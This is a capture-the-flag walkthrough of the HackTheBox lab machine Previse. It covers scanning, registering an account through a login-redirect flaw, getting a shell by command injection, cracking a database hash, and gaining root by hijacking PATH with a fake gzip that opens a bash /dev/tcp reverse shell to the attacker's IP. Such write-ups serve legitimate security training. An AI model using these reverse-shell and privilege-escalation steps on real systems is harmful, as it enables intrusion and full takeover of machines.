Preface#
privise target machine, randomly selected from an htb arena, let's see if we can do it.
Arena link: 10.10.11.104
Information Gathering#
Directly access http://10.10.11.104/login.php, a login box.
Try weak passwords, universal password.
Port scanning
nmap -T4 -sC -sV -p- 10.10.11.104
fscan scanning, found two ports, 22 and 80.
![[Pasted image 20220108200845.png]]
Fingerprint recognition
Vulnerability Exploitation#
nuclei scanning found an openssh user enumeration vulnerability.
Using this vulnerability, the following ssh-related accounts were discovered:
4Dgifts
EZsetup
OpenSSH
OutOfBox
ROOT
adm
admin
administrator
anon
auditor
avahi
avahi-autoipd
backup
bbs
bin
checkfs
checkfsys
checksys
cmwlogin
couchdb
daemon
dbadmin
demo
demos
diag
distccd
dni
fal
fax
ftp
games
gdm
gnats
guest
haldaemon
halt
install
irc
kernoops
libuuid
list
listen
lpadm
lpadmin
lynx
mail
man
me
mountfs
mountfsys
mountsys
news
noaccess
nobody
nobody4
nxpgsql
operator
oracle
popr
postmaster
rfindd
saned
sshd
symop
sync
sysadm
sysadmin
syslog
system_admin
udadmin
ultra
us_admin
user
uucp
uucpadm
web
webmaster
www-data
xpopr
zabbix
Directory scanning
Use gobuster for directory scanning, other tools like ffuf and dirsearch did not find anything.
gobuster dir -w /p12-字典收集/web漏洞/目录fuzz/directory-list-2.3-medium.txt -u http://10.10.11.104/ -x php,html,txt
The approximate results are as follows:
Looking at some with a status of 200, we can see that there is a nav.php, let's visit and see, the interface is as follows:
Directly accessing these pages will redirect to login.php, but if accessed with burp, you can see the relevant pages.
To register an account, you need to first copy the post request packet, then create a new html document, fill in the complete request link in the action, and register the user.
<form role="form" method="post" action="http://10.10.11.104/accounts.php">
<div class="uk-margin">
<div class="uk-inline">
<span class="uk-form-icon" uk-icon="icon: user"></span>
<input type="text" name="username" class="uk-input" id="username" placeholder="Username">
</div>
</div>
<div class="uk-margin">
<div class="uk-inline">
<span class="uk-form-icon" uk-icon="icon: lock"></span>
<input type="password" name="password" class="uk-input" id="password" placeholder="Password">
</div>
</div>
<div class="uk-margin">
<div class="uk-inline">
<span class="uk-form-icon" uk-icon="icon: lock"></span>
<input type="password" name="confirm" class="uk-input" id="confirm" placeholder="Confirm Password">
</div>
</div>
<button type="submit" name="submit" class="uk-button uk-button-default">CREATE USER</button>
</form>
Use the registered user to log in, the registered account is admin1/admin123.
Visit the http://10.10.11.104/files.php page, download a compressed file and find that it is a source code file.
The source code is as follows:
Analyze the source code, at the logs.php, there is a command execution vulnerability.
Capture http://10.10.11.104/file_logs.php, the payload is as follows, nc listens and gets a shell.
Local IP.
Elevate to an interactive terminal.
python3 -c "import pty;pty.spawn('/bin/bash')"
In the previously backed up source code file, the database password was found.
See if you can connect to the database.
mysql -uroot -p
show databases;
use previse;
select * from accounts;
This password is an md5 password, use john to crack it.
The password is ilovecody112235!.
SSH login to the m4lwhere account and find the first flag.
Privilege Escalation#
Next, we need to escalate to the root user.
Use sudo -l
to view the files running as root.
The access_backup.sh script has write and execute permissions.
The file content is:
#!/bin/bash
# We always make sure to store logs, we take security SERIOUSLY here
# I know I shouldnt run this as root but I cant figure it out programmatically on my account
# This is configured to run with cron, added to sudo so I can run as needed - we'll fix it later when there's time
gzip -c /var/log/apache2/access.log > /var/backups/$(date --date="yesterday" +%Y%b%d)_access.gz
gzip -c /var/www/file_access.log > /var/backups/$(date --date="yesterday" +%Y%b%d)_file_access.gz
This file calls the gzip command to back up logs, through this we can escalate privileges, because this script is running as root, so we just need to replace the gzip command.
cd /tmp
#vim gzip and write the following content
#/bin/bash
bash -i >& /dev/tcp/10.10.16.21/1234 0>&1
#Give permissions
chmod 777 gzip
export PATH=$(pwd):$PATH
#Then execute the script access_backup.sh
sudo /opt/scripts/access_backup.sh
Successfully bounce back to shell and get the flag.